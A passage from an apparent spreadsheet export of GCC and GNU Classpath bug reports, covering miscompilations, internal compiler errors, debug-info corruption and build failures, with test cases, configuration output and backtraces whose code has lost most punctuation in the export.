Configured with: ../src/configure -v --with-pkgversion='Debian 5.3.1-13' --with-bugurl=file:///usr/share/doc/gcc-5/README.Bugs --enable-languages=cadac++javagodfortranobjcobj-c++ --prefix=/usr --program-suffix=-5 --enable-shared --enable-linker-build-id --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --with-default-libstdcxx-abi=new --enable-gnu-unique-object --disable-libitm --disable-libquadmath --enable-plugin --with-system-zlib --disable-browser-plugin --enable-java-awt=gtk --enable-gtk-cairo --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-5-armhf/jre --enable-java-home --with-jvm-root-dir=/usr/lib/jvm/java-1.5.0-gcj-5-armhf --with-jvm-jar-dir=/usr/lib/jvm-exports/java-1.5.0-gcj-5-armhf --with-arch-directory=arm --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --enable-objc-gc --enable-multiarch --disable-sjlj-exceptions --with-arch=armv7-a --with-fpu=vfpv3-d16 --with-float=hard --with-mode=thumb --enable-checking=release --build=arm-linux-gnueabihf --host=arm-linux-gnueabihf --target=arm-linux-gnueabihf
Thread model: posix
gcc version 5.3.1 20160323 (Debian 5.3.1-13) 
With a struct set up with bitfield values like this:
struct mystruct {
        unsigned int uid_set : 1
        unsigned int is_loaded : 1
        unsigned int nonexistent : 1
}
The following C code is compiled to bad ARMv7 assembly under certain circumstances at -O2:
        if (!user-&gt;is_loaded) 
                set_is_loaded (user 1)
The resultant bad assembly is:
  14:	7803      	ldrb	r3 [r0 #0]
  16:	079b      	lsls	r3 r3 #30
  18:	d400      	bmi.n	1c 
  1a:	d000      	beq.n	1e 
  1c:	4770      	bx	lr
  1e:	e7ef      	b.n	0 
In the bitfield uid_set is bit 0 and is_loaded is bit 1.
The assembly loads the bitfield value and shifts left to have the value of is_loaded at bit 31. So the bmi instruction makes perfect sense: if is_loaded is set jump to some code that is not going to call set_is_loaded.
The following beq instruction is bad. Here we have is_loaded at bit 31 but we also have uid_set at bit 30. So the value of uid_set is clearly going to influence the code behaviour here: if uid_set is 1 we will not call set_is_loaded.
This issue originates from freedesktop's accountsservice where I noticed the incorrect runtime behaviour.
I am attaching a minimal test case which you can compile with:
gcc -O2 -g -c main.c -o out.o
gcc -c other.c -o other.o
gcc other.o out.o -o prog
Run with:
./prog 0
./prog 1
The argument controls the value of uid_set. It should have no effect on the runtime behaviour but you'll notice that myfunc is only called when the arg is 0.
Unfortunately I couldn't figure out how to slim down the test case into a single file as that resulted in different (working) asm being generated.
I'm also attaching the preprocessed version of main.c.</t>
  </si>
  <si>
    <t>GCC-41838</t>
  </si>
  <si>
    <t>Incorrect dereferencing pointer '' does break strict-aliasing rules</t>
  </si>
  <si>
    <t>The attached Triple.i when compiled with `g++ -c -O2 -Wstrict-aliasing Triple.i` returns:
Triple.i: In function 'void setOSName(const StringRef&amp;)':
Triple.i:9: warning: dereferencing pointer '' does break strict-aliasing rules
Triple.i:9: note: initialized from here
Line 9 is:
if (LHSKind == TwineKind) return static_cast(LHS)-&gt;LHSKind
I believe the warning is incorrect since when LHSKind == TwineKind LHS is only assigned a Twine*. There's no aliasing through the void*. (And in this subprogram LHSKind is in fact never ==TwineKind.)
The warning goes away if I delete the __builtin_expect.
$ g++ -v
Using built-in specs.
Target: i386-apple-darwin9
Configured with: ../gcc-4.4.1/configure --prefix=/opt/local --build=i386-apple-darwin9 --enable-languages=cc++objcobj-c++javafortran --libdir=/opt/local/lib/gcc44 --includedir=/opt/local/include/gcc44 --infodir=/opt/local/share/info --mandir=/opt/local/share/man --with-local-prefix=/opt/local --with-system-zlib --disable-nls --program-suffix=-mp-4.4 --with-gxx-include-dir=/opt/local/include/gcc44/c++/ --with-gmp=/opt/local --with-mpfr=/opt/local
Thread model: posix
gcc version 4.4.1 (GCC)</t>
  </si>
  <si>
    <t>GCC-65694</t>
  </si>
  <si>
    <t>[5 Regression] ICE (in decompose at rtl.h:2007) on arm-linux-gnueabihf</t>
  </si>
  <si>
    <t>Created attachment 35254
preprocessed source
I'm aware of PR65321 but this is with r221867 on arm-linux-gnueabihf.
$ gcc -v
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/lib/gcc/arm-linux-gnueabihf/5/lto-wrapper
Target: arm-linux-gnueabihf
Configured with: ../src/configure -v --with-pkgversion='Ubuntu 5-20150404-0ubuntu11' --with-bugurl=file:///usr/share/doc/gcc-5/README.Bugs --enable-languages=cadac++javagofortranobjcobj-c++ --prefix=/usr --program-suffix=-5 --enable-shared --enable-linker-build-id --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --with-default-libstdcxx-abi=c++98 --enable-gnu-unique-object --disable-libitm --disable-libquadmath --enable-plugin --with-system-zlib --disable-browser-plugin --enable-java-awt=gtk --enable-gtk-cairo --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-5-armhf/jre --enable-java-home --with-jvm-root-dir=/usr/lib/jvm/java-1.5.0-gcj-5-armhf --with-jvm-jar-dir=/usr/lib/jvm-exports/java-1.5.0-gcj-5-armhf --with-arch-directory=arm --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --enable-objc-gc --enable-multiarch --enable-multilib --disable-sjlj-exceptions --with-arch=armv7-a --with-fpu=vfpv3-d16 --with-float=hard --with-mode=thumb --disable-werror --enable-multilib --enable-checking=yes --build=arm-linux-gnueabihf --host=arm-linux-gnueabihf --target=arm-linux-gnueabihf
Thread model: posix
gcc version 5.0.0 20150404 (experimental) [trunk revision 221867] (Ubuntu 5-20150404-0ubuntu11) 
$ g++  -c -g -O2 -std=c++98 dnaclust.ii
dnaclust.cpp: In function 'Index twoMeans(Index Index)':
dnaclust.cpp:753:1: internal compiler error: in decompose at rtl.h:2007
 } // twoMeans
 ^
0x65c651 wi::int_traits &gt;::decompose(long long* unsigned int std::pair const&amp;)
        ../../src/gcc/rtl.h:2005
0x65c651 wide_int_ref_storage::wide_int_ref_storage &gt;(std::pair const&amp; unsigned int)
        ../../src/gcc/wide-int.h:957
0x65c651 generic_wide_int &gt;::generic_wide_int &gt;(std::pair const&amp; unsigned int)
        ../../src/gcc/wide-int.h:733
0x65c651 bool wi::eq_p std::pair &gt;(std::pair const&amp; std::pair const&amp;)
        ../../src/gcc/wide-int.h:1715
0x65c651 simplify_const_relational_operation(rtx_code machine_mode rtx_def* rtx_def*)
        ../../src/gcc/simplify-rtx.c:4919
0x65c6b3 simplify_relational_operation(rtx_code machine_mode machine_mode rtx_def* rtx_def*)
        ../../src/gcc/simplify-rtx.c:4413
0x65cced simplify_gen_relational(rtx_code machine_mode machine_mode rtx_def* rtx_def*)
        ../../src/gcc/simplify-rtx.c:441
0x66054f simplify_replace_fn_rtx(rtx_def* rtx_def const* rtx_def* (*)(rtx_def* rtx_def const* void*) void*)
        ../../src/gcc/simplify-rtx.c:501
0x6604cb simplify_replace_fn_rtx(rtx_def* rtx_def const* rtx_def* (*)(rtx_def* rtx_def const* void*) void*)
        ../../src/gcc/simplify-rtx.c:507
0x9f43d9 bypass_block
        ../../src/gcc/cprop.c:1608
0x9f43d9 bypass_conditional_jumps
        ../../src/gcc/cprop.c:1726
0x9f43d9 one_cprop_pass
        ../../src/gcc/cprop.c:1887
0x9f43d9 execute_rtl_cprop
        ../../src/gcc/cprop.c:1931
0x9f43d9 execute
        ../../src/gcc/cprop.c:1969
Please submit a full bug report
with preprocessed source if appropriate.</t>
  </si>
  <si>
    <t>GCC-59403</t>
  </si>
  <si>
    <t>[4.8.2] Segmentation fault in crash_signal</t>
  </si>
  <si>
    <t>Our project compiles OK with 4.8.1  however switching to 4.8.2 causes g++ to segfault !!  When -v -save-temps is added to the command line options the compilation passes OK !!
------------------------
$ uname -a
Linux ws-boaz 2.6.18-308.el5 #1 SMP Fri Jan 27 17:17:51 EST 2012 x86_64 x86_64 x86_64 GNU/Linux
$ gcc -v
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/opt/paraccel/gcc_4_8_2/libexec/gcc/x86_64-unknown-linux-gnu/4.8.2/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ./configure --prefix=/opt/paraccel/gcc_4_8_2 --enable-languages=cc++ --disable-multilib
Thread model: posix
gcc version 4.8.2 (GCC)
-----------
$ g++ -c -g -DXEN_DEBUG -W -Wall -Werror -fdiagnostics-show-option -Wno-error=uninitialized -Wno-error=strict-overflow -Wno-error=strict-aliasing -Wno-unused-local-typedefs -I /home/paraccel/branches/gcc_4_8_2/obj/utils -L /home/paraccel/branches/gcc_4_8_2/obj/utils -DLINUX -DSYS=B4_2 -I/home/paraccel/branches/gcc_4_8_2/src/pg/src/include/mb -I/home/paraccel/branches/gcc_4_8_2/src/sys -I/home/paraccel/branches/gcc_4_8_2/src/xen_utils -I/home/paraccel/branches/gcc_4_8_2/src/pg/src/include/libpq -I/home/paraccel/branches/gcc_4_8_2/src/backup -I/home/paraccel/branches/gcc_4_8_2/src/pg/src/include/catalog -I/home/paraccel/branches/gcc_4_8_2/src/pg/src/include/commands -I/home/paraccel/branches/gcc_4_8_2/src/pg/src/include/storage -I/home/paraccel/branches/gcc_4_8_2/src/pg/src/include/nodes -I/home/paraccel/branches/gcc_4_8_2/src/pg/src/include/access -I/home/paraccel/branches/gcc_4_8_2/src/pg/src/include/utils -I/home/paraccel/branches/gcc_4_8_2/obj/pg -I/home/paraccel/branches/gcc_4_8_2/src/pg/src/include -I/home/paraccel/branches/gcc_4_8_2/src/sysmgr -I/home/paraccel/branches/gcc_4_8_2/obj/backup /home/paraccel/branches/gcc_4_8_2/src/backup/backupdb.cpp
In file included from /home/paraccel/branches/gcc_4_8_2/src/xen_utils/xen_global.hpp:11:0
                 from /home/paraccel/branches/gcc_4_8_2/src/xen_utils/xen_except.hpp:33
                 from /home/paraccel/branches/gcc_4_8_2/src/backup/backupdb.cpp:32:
/home/paraccel/branches/gcc_4_8_2/src/xen_utils/bigint.hpp:17:7: internal compiler error: Segmentation fault
 class Bigint
       ^
0x890fdf crash_signal
        ../.././gcc/toplev.c:332
0x6b2239 add_name_attribute
        ../.././gcc/dwarf2out.c:15722
0x6b2239 modified_type_die
        ../.././gcc/dwarf2out.c:10197
0x6b3c8b add_type_attribute
        ../.././gcc/dwarf2out.c:16497
0x6be2e9 gen_formal_parameter_die
        ../.././gcc/dwarf2out.c:17089
0x6bec16 gen_formal_types_die
        ../.././gcc/dwarf2out.c:17185
0x6aba6a gen_subprogram_die
        ../.././gcc/dwarf2out.c:17919
0x6afa28 gen_decl_die
        ../.././gcc/dwarf2out.c:19994
0x6b1570 gen_member_die
        ../.././gcc/dwarf2out.c:19045
0x6b1570 gen_struct_or_union_type_die
        ../.././gcc/dwarf2out.c:19117
0x6b1570 gen_tagged_type_die
        ../.././gcc/dwarf2out.c:19307
0x6b1c8e gen_type_die_with_usage
        ../.././gcc/dwarf2out.c:19454
0x6b0112 gen_decl_die
        ../.././gcc/dwarf2out.c:20017
0x7ff915 rest_of_type_compilation(tree_node* int)
        ../.././gcc/passes.c:215
0x52c1d7 finish_struct_1(tree_node*)
        ../.././gcc/cp/class.c:6444
0x52cdfc finish_struct(tree_node* tree_node*)
        ../.././gcc/cp/class.c:6609
0x5459c6 cp_parser_class_specifier_1
        ../.././gcc/cp/parser.c:18412
0x5459c6 cp_parser_class_specifier
        ../.././gcc/cp/parser.c:18620
0x5459c6 cp_parser_type_specifier
        ../.././gcc/cp/parser.c:13682
0x5587b5 cp_parser_decl_specifier_seq
        ../.././gcc/cp/parser.c:11007
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
*** Error code 1</t>
  </si>
  <si>
    <t>boaz</t>
  </si>
  <si>
    <t>GCC-4154</t>
  </si>
  <si>
    <t>copy a structure argument with negative length (gcc3.0.1 mips3)</t>
  </si>
  <si>
    <t>When gcc passes some values and a structure argumnt to a function
a structure argumnt is copied with negative length by memcpy().
FIX2 code generates same code as gcc-2.95.2 generates.
Release:
gcc-3.0.1
Environment:
NetBSD-1.4.3 mips3(R5200) ELF
How-To-Repeat:
struct sss {
        char buf[20]
}
xxx(int x int y struct sss s)
{
}
main()
{
        struct sss s0
        xxx(0 1 s0)
}</t>
  </si>
  <si>
    <t>saito</t>
  </si>
  <si>
    <t>GCC-2868</t>
  </si>
  <si>
    <t>using RTTI instruction on cout</t>
  </si>
  <si>
    <t>the generated programme crash when using some RTTI
instruction.
&gt; g++ -v -save-temps -Wall dynamic_cast.cpp -o dynamic_cast
Reading specs from /snakesofts/development/compilers/gcc-2.95-2/sparc-sun-solaris2.7/lib/gcc-lib/sparc-sun-solaris2.7/2.95.2/specs
gcc version 2.95.2 19991024 (release)
 /snakesofts/development/compilers/gcc-2.95-2/sparc-sun-solaris2.7/lib/gcc-lib/sparc-sun-solaris2.7/2.95.2/cpp -lang-c++ -v -D__GNUC__=2 -D__GNUG__=2 -D__GNUC_MINOR__=95 -D__cplusplus -Dsparc -Dsun -Dunix -D__svr4__ -D__SVR4 -D__sparc__ -D__sun__ -D__unix__ -D__svr4__ -D__SVR4 -D__sparc -D__sun -D__unix -Asystem(unix) -Asystem(svr4) -D__EXCEPTIONS -Wall -D__GCC_NEW_VARARGS__ -Acpu(sparc) -Amachine(sparc) dynamic_cast.cpp dynamic_cast.ii
GNU CPP version 2.95.2 19991024 (release) (sparc)
#include ... search starts here:
#include  search starts here:
 /snakesofts/development/compilers/gcc-2.95-2/sparc-sun-solaris2.7/lib/gcc-lib/sparc-sun-solaris2.7/2.95.2/../../../../include/g++-3
 /snakesofts/development/compilers/gcc-2.95-2/sparc-sun-solaris2.7/include
 /snakesofts/development/compilers/gcc-2.95-2/sparc-sun-solaris2.7/lib/gcc-lib/sparc-sun-solaris2.7/2.95.2/../../../../sparc-sun-solaris2.7/include
 /snakesofts/development/compilers/gcc-2.95-2/sparc-sun-solaris2.7/lib/gcc-lib/sparc-sun-solaris2.7/2.95.2/include
 /usr/include
End of search list.
The following default directories have been omitted from the search path:
End of omitted list.
 /snakesofts/development/compilers/gcc-2.95-2/sparc-sun-solaris2.7/lib/gcc-lib/sparc-sun-solaris2.7/2.95.2/cc1plus dynamic_cast.ii -quiet -dumpbase dynamic_cast.cc -Wall -version -o dynamic_cast.s
GNU C++ version 2.95.2 19991024 (release) (sparc-sun-solaris2.7) compiled by GNU C version 2.95.2 19991024 (release).
 /usr/ccs/bin/as -V -Qy -s -o dynamic_cast.o dynamic_cast.s
/usr/ccs/bin/as: WorkShop Compilers 5.0 Alpha 03/27/98 Build
ld: Software Generation Utilities - Solaris/ELF (3.0)
Release:
gcc version 2.95.2 19991024 (release)
Environment:
sparc-sun-solaris2.7 or hppa2.0w-hp-hpux11.00 or 
i686-pc-linux-gnu
How-To-Repeat:
./dynamic_cast 
./dynamic_cast t</t>
  </si>
  <si>
    <t>frederic.giroud</t>
  </si>
  <si>
    <t>GCC-6955</t>
  </si>
  <si>
    <t>collect2 says core dumped when there is no core</t>
  </si>
  <si>
    <t>When ld called by collect2 crashes without a core dump collect2 says
collect2: ld terminated with signal 11 [Segmentation fault] core dumped
But when I set ulimit -c unlimited and repeat the step so that I
get a core dump collect2 says merely
collect2: ld terminated with signal 11 [Segmentation fault]
Release:
3.1
Environment:
System: Linux linuix 2.4.18-4GB #1 Wed Mar 27 13:57:05 UTC 2002 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: sparc64-unknown-linux-gnu
configured with: /packages2/gcc-3.1/configure --enable-shared --disable-nls --target=sparc64-linux --prefix=/cross/sparc64-linux-tools --with-local-prefix=/cross/sparc64-linux/local --with-as=/cross/sparc64-linux-tools/bin/sparc64-linux-as --with-gnu-as --with-ld=/cross/sparc64-linux-tools/bin/sparc64-linux-ld --with-gnu-ld --enable-languages=c
How-To-Repeat:
Give a link command line that makes ld crash. Once with ulimit -c 0
once with ulimit -c unlimited.</t>
  </si>
  <si>
    <t>GCC-7431</t>
  </si>
  <si>
    <t>Compile glibc-2.2.5</t>
  </si>
  <si>
    <t xml:space="preserve">
Release:
gcc-3.1.1</t>
  </si>
  <si>
    <t>george</t>
  </si>
  <si>
    <t>GCC-44111</t>
  </si>
  <si>
    <t>[4.6 Regression] Bootstrap failure for powerpc-apple-darwin9 from revision 159339</t>
  </si>
  <si>
    <t>Bootstrap failure for powerpc-apple-darwin9 from revision 159339:
...
/opt/gcc/darwin_buildw/./prev-gcc/xgcc -B/opt/gcc/darwin_buildw/./prev-gcc/ -B/opt/gcc/gcc4.6w/powerpc-apple-darwin9/bin/ -B/opt/gcc/gcc4.6w/powerpc-apple-darwin9/bin/ -B/opt/gcc/gcc4.6w/powerpc-apple-darwin9/lib/ -isystem /opt/gcc/gcc4.6w/powerpc-apple-darwin9/include -isystem /opt/gcc/gcc4.6w/powerpc-apple-darwin9/sys-include    -c  -g -O2 -mdynamic-no-pic -gtoggle -DIN_GCC   -W -Wall -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -Werror -Wold-style-definition -Wc++-compat -fno-common  -DHAVE_CONFIG_H -I. -I. -I../../gcc-4.6-work/gcc -I../../gcc-4.6-work/gcc/. -I../../gcc-4.6-work/gcc/../include -I../../gcc-4.6-work/gcc/../libcpp/include -I/sw/include -I/sw/include  -I../../gcc-4.6-work/gcc/../libdecnumber -I../../gcc-4.6-work/gcc/../libdecnumber/dpd -I../libdecnumber -I/sw/include  -I/sw/include -DCLOOG_PPL_BACKEND    ../../gcc-4.6-work/gcc/targhooks.c -o targhooks.o
../../gcc-4.6-work/gcc/targhooks.c: In function 'default_mode_dependent_address_p':
../../gcc-4.6-work/gcc/targhooks.c:968:3: error: passing argument 1 of 'rs6000_mode_dependent_address_ptr' discards qualifiers from pointer target type [-Werror]
../../gcc-4.6-work/gcc/targhooks.c:968:3: note: expected 'rtx' but argument is of type 'const_rtx'
cc1: all warnings being treated as errors
make[3]: *** [targhooks.o] Error 1
make[2]: *** [all-stage2-gcc] Error 2
make[1]: *** [stage2-bubble] Error 2
make: *** [all] Error 2
See also http://gcc.gnu.org/ml/gcc-patches/2010-05/msg00915.html .
Replacing const_rtx with rtx in gcc/targhooks.* allows bootstrap to proceed.</t>
  </si>
  <si>
    <t>CLASSPATH-39408</t>
  </si>
  <si>
    <t>cp-tools</t>
  </si>
  <si>
    <t>gjavah doesn't generate constants in header files where they occur in a superclass</t>
  </si>
  <si>
    <t>In OpenJDK[7] b50:
../../../src/solaris/native/sun/nio/ch/FileDispatcherImpl.c: In function 'Java_sun_nio_ch_FileDispatcherImpl_lock0':
../../../src/solaris/native/sun/nio/ch/FileDispatcherImpl.c:195: error: 'sun_nio_ch_FileDispatcherImpl_NO_LOCK' undeclared (first use in this function)
../../../src/solaris/native/sun/nio/ch/FileDispatcherImpl.c:195: error: (Each undeclared identifier is reported only once
../../../src/solaris/native/sun/nio/ch/FileDispatcherImpl.c:195: error: for each function it appears in.)
../../../src/solaris/native/sun/nio/ch/FileDispatcherImpl.c:197: error: 'sun_nio_ch_FileDispatcherImpl_INTERRUPTED' undeclared (first use in this function)
NO_LOCK and INTERRUPTED are not declared in FileDispatcherImpl but in FileDispatcher.</t>
  </si>
  <si>
    <t>GCC-29013</t>
  </si>
  <si>
    <t>gcj generates a MetalLookAndFeel class that fails cacao's verifier</t>
  </si>
  <si>
    <t>When compiling GNU classpath (CVS 20060901) with gcj I get a java.lang.VerifyError when running a Swing app with cacao:
jet:~/work/svn/batik/trunk-gcj $ /usr/local/cacao/bin/cacao -jar batik-1.6/batik.jar samples/asf-logo.svg 2&gt;&amp;1 
Exception in thread main java.lang.VerifyError: (class: javax.swing.plaf.metal.MetalLookAndFeel method: createDefaultTheme signature: ()V) Stack size too large
   at javax.swing.plaf.metal.MetalLookAndFeel.getDefaults(MetalLookAndFeel.java:154)
   at javax.swing.UIManager.setLookAndFeel(UIManager.java:911)
   at javax.swing.UIManager.(UIManager.java:243)
   at javax.swing.JPanel.updateUI(JPanel.java:176)
   at javax.swing.JPanel.(JPanel.java:129)
   at javax.swing.JPanel.(JPanel.java)
   at javax.swing.JRootPane.createGlassPane(JRootPane.java:564)
   at javax.swing.JRootPane.getGlassPane(JRootPane.java:475)
   at javax.swing.JRootPane.(JRootPane.java:527)
   at javax.swing.JDialog.createRootPane(JDialog.java:389)
   at javax.swing.JDialog.getRootPane(JDialog.java:363)
   at javax.swing.JDialog.dialogInit(JDialog.java:250)
   at javax.swing.JDialog.(JDialog.java:238)
   at javax.swing.JDialog.(JDialog.java)
   at org.apache.batik.apps.svgbrowser.JAuthenticator.initWindow(JAuthenticator.java:93)
   at org.apache.batik.apps.svgbrowser.JAuthenticator.(JAuthenticator.java:88)
   at org.apache.batik.apps.svgbrowser.Main.(Main.java:317)
   at org.apache.batik.apps.svgbrowser.Main.main(Main.java:157)
gcj version:
gcj (GCC) 4.1.2 20060901 (prerelease) (Debian 4.1.1-13)</t>
  </si>
  <si>
    <t>cam-gcc-bugzilla</t>
  </si>
  <si>
    <t>GCC-9832</t>
  </si>
  <si>
    <t>ARM: Arithmetic and move could be combined using liveness information</t>
  </si>
  <si>
    <t>Arithmetic and move instructions are replaced by a combined arithmetic in ARM target. The combine cannot be done if the destination of the arithmetic is also used. However if based on liveness information this destination is never used the combine could be safely applied.
For example in file ... if r4 is not used after the and instruction the combine can be applied as in the modified file.
Release:
gcc version 3.3 20030217 (prerelease)
Environment:
BUILD &amp; HOST: Linux 2.4.20 i686 unknown
TARGET: arm-unknown-elf
How-To-Repeat:
gcc -S -Os 01.i
// 01.i
# 1 01.c
# 1 
# 1 
# 1 01.c
void func(char c int t)
{
}
void foo(int u)
{
  func ( 8 (u &gt;&gt; 24) 
  func ( 8 (u &gt;&gt; 16) 
}</t>
  </si>
  <si>
    <t>lac</t>
  </si>
  <si>
    <t>GCC-47111</t>
  </si>
  <si>
    <t>mips-rtems: redefinition of NO_IMPLICIT_EXTERN_C</t>
  </si>
  <si>
    <t>In file included from ./tm.h:20:0
                 from ../../../gcc/gcc/gensupport.c:24:
../../../gcc/gcc/config/rtems.h:21:0: error: NO_IMPLICIT_EXTERN_C redefined [-Werror]
../../../gcc/gcc/config/mips/elf.h:51:0: note: this is the location of the previous definition
cc1: all warnings being treated as errors
make[2]: *** [build/gensupport.o] Error 1</t>
  </si>
  <si>
    <t>GCC-26093</t>
  </si>
  <si>
    <t>Segmentation fault compiling with -fmudflap</t>
  </si>
  <si>
    <t>The following c++ code causes a segmentation fault in the 4.0.2 on my fedora 4 system:
class foo {
public:
  foo()
}
class bar {
public:
  bar()
}
class IoMgr {
private:
  void initial()
private:
  foo *onp_
  bar *ocp_
}
void IoMgr::initial() {
  onp_ = new foo[2]
  ocp_ = new bar
}
// compiled with g++ -c foo.cpp -fmudflap
foo.cpp: In member function 'void IoMgr::initial()':
foo.cpp:18: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>idht4n</t>
  </si>
  <si>
    <t>GCC-66728</t>
  </si>
  <si>
    <t>[5 Regression] CONST_WIDE_INT causes corrupted DWARF debug info</t>
  </si>
  <si>
    <t>Compiling the following test case:
__uint128_t test(void)
{
  static const __uint128_t two127 = ((__uint128_t) 1) &lt;&lt; 127
  return two127
}
on x86_64-linux (or ppc64le-linux) with -O -S -g -dA results in:
        .uleb128 0x2    # (DIE (0x2d) DW_TAG_subprogram)
                        # DW_AT_external
        .long   .LASF3  # DW_AT_name: test
[snip]
        .uleb128 0x3    # (DIE (0x4e) DW_TAG_variable)
        .long   .LASF4  # DW_AT_name: two127
        .byte   0x1     # DW_AT_decl_file (xxx.i)
        .byte   0x4     # DW_AT_decl_line
        .long   0x61    # DW_AT_type
        .byte   0       # end of children of DIE 0x2d
But abbreviation 3 (used for the 0x4e DIE) reads:
        .uleb128 0x3    # (abbrev code)
        .uleb128 0x34   # (TAG: DW_TAG_variable)
        .byte   0       # DW_children_no
        .uleb128 0x3    # (DW_AT_name)
        .uleb128 0xe    # (DW_FORM_strp)
        .uleb128 0x3a   # (DW_AT_decl_file)
        .uleb128 0xb    # (DW_FORM_data1)
        .uleb128 0x3b   # (DW_AT_decl_line)
        .uleb128 0xb    # (DW_FORM_data1)
        .uleb128 0x49   # (DW_AT_type)
        .uleb128 0x13   # (DW_FORM_ref4)
        .uleb128 0x1c   # (DW_AT_const_value)
        .uleb128 0xa    # (DW_FORM_block1)
        .byte   0
        .byte   0
So the variable DIE should have an DW_AT_const_value attribute encoded as DW_FORM_block1.  This makes sense since the variable was optimized away due to being constant and the size of the constant is 16 bytes.
However the code in .debug_info to construct the DIE does not emit any DW_FORM_block1 in fact it does not emit *anything* where the DW_AT_const_value is expected.  This causes the resulting debug info to be corrupted and tools operating on this info will emit errors (or even crash).
On ppc64le-linux (but not x86_64-linux) the same problem occurs with GCC 5 as well.  The difference seems to be that x86_64 in GCC 5 uses a CONST_DOUBLE instead of a CONST_WIDE_INT to represent that 128-bit constant.</t>
  </si>
  <si>
    <t>GCC-51723</t>
  </si>
  <si>
    <t>[C++0x] delegating constructor ICE</t>
  </si>
  <si>
    <t>The following reduced code generates an ICE in gcc version 4.7.0 20111219:
template 
struct A
  {
  static constexpr int a[sizeof...(V)] = { V... }
  }
template  constexpr int A::a[]
struct B
  {
  const int* const b
  template 
  constexpr B(const int(&amp;b)[N])
      : b(b)
    { }
  template 
  constexpr B(A)
      : B(A::a)  /* replace 'B' with 'b' to compile without ICE */
    { }
  }
constexpr B works      = A::a /* uses first ctor  */
constexpr B causes_ice = A()  /* uses second ctor */
The ICE occurs around the delegating constructor but the code compiles correctly if it is substituted for a non-delegating form of the constructor.
The message from gcc is:
ice.cpp: In instantiation of 'constexpr B::B(A) [with int ...V = {10 20 30}]':
ice.cpp:25:40:   required from here
ice.cpp:21:7: internal compiler error: in build_data_member_initialization at cp/semantics.c:5844
Please submit a full bug report
with preprocessed source if appropriate.</t>
  </si>
  <si>
    <t>andyg1001</t>
  </si>
  <si>
    <t>GCC-13313</t>
  </si>
  <si>
    <t>[3.4 Regression] Wrong code generated</t>
  </si>
  <si>
    <t>When the following code is compiled
---------------------
# 1 
# 1 
# 1 test.c
extern void DisplayNumber (unsigned long)
unsigned long ReadNumber ()
{
 return 8L
}
void test_a (void)
{
 unsigned long tmp
 tmp = (ReadNumber() 
 DisplayNumber (tmp)
}
------------------------------------------
The code generated for the test_a function is incorrect.
The compiler is mainline CVS built on 20031127 
Compiler command line was 
h8300-hitachi-elf-gcc -v --save-temps -Wall -I include -Wa-a=test.lst  -
gstabs -O1 -finline -c test.c
Compiler was configured as 
/home/administrator/h8-build/src2/configure --build=i686-pc-cygwin --host=i686-
pc-cygwin --target=h8300-hitachi-elf --with-included-gettext --disable-
libstdcxx_pch --enable-multilib</t>
  </si>
  <si>
    <t>GCC-61483</t>
  </si>
  <si>
    <t>[AArch64] builtin va_start incorrectly initializes the field of va_list for incoming unnamed arguments on the stack</t>
  </si>
  <si>
    <t>The following code is mis-compiled by gcc when targeting aarch64. The issue is that the second variadic argument to callee_b0f which is of type long long is not retrieved correctly inside the callee.
------------------- CODE -------------------
#include 
#include 
struct float_float_t { float a b  } float_float = {1.2 2.2}
union float_int_t {
    float b8
    int b5
} float_int = {4983.80}
long long correct = 12683143434LL
long long callee_b0f(float f1 float f2 float f3 float f4
                float f5 float f6 float f7 struct float_float_t ff
                int i1 int i2 int i3 int i4
                int i5 int i6 int i7
                ...) {
    va_list ap
    va_start(ap i7)
    va_arg(ap union float_int_t)
    long long var = va_arg(ap long long)
    va_end(ap)
    return var
}
int main()
{
    long long check = callee_b0f(1.0 2.0 3.0 4.0
                                 5.0 6.0 7.0 float_float
                                 9 10 11 12
                                 13 14 15
                                 float_int correct)
    printf(%lld\n%lld\n correct check)
    return 0
}
------------------- CUT -------------------
Expected output:
12683143434
12683143434
Actual output:
12683143434
0
I have checked that this bug is present since 4.8.0 (day one of the aarch64 port).</t>
  </si>
  <si>
    <t>yufeng</t>
  </si>
  <si>
    <t>GCC-65135</t>
  </si>
  <si>
    <t>[6 Regression] Performance regression  in pic mode after r220674.</t>
  </si>
  <si>
    <t>We noticed 10% regression on one important benchmark using for testing x86 32-bit platforms. This regression can be reproduced on attached test-case: one more fill is present in innermost loop after r220674. One possible decision is spillong  live phisical registers not referenced in (innermost) loops (GOT-register in out test-case) in loop preheader with subsequent restore it in loop post header. Note that regression can be seen only in pic mode for 32-bit x86 platform.</t>
  </si>
  <si>
    <t>GCC-38798</t>
  </si>
  <si>
    <t>[c++0x] Trouble with struct/class/enum keyword in late return types</t>
  </si>
  <si>
    <t>The following (IMHO valid) code snippet is rejected on trunk:
==============================
struct A {}
auto foo() -&gt; struct A {}
==============================
bug.cc:2: error: redefinition of 'struct A'
bug.cc:1: error: previous definition of 'struct A'
bug.cc:2: error: expected initializer at end of input
Apparently {} is not treated as the function body but as definition
of struct A. According to n2541 late function return types are type-ids.
Therefore {} shouldn't be parsed as type definition IMHO.
Btw the following invalid code snippet is accepted:
==============================
auto foo() -&gt; struct A {} {}
==============================
Again the first pair of {}'s is parsed as type definition.
In addition the compiler doesn't complain about defining types
in a return type which has always been forbidden.
The same happens for enums:
==============================
enum E { e }
auto foo() -&gt; enum E {}
==============================
==============================
auto foo() -&gt; enum E {} {}
==============================</t>
  </si>
  <si>
    <t>GCC-42157</t>
  </si>
  <si>
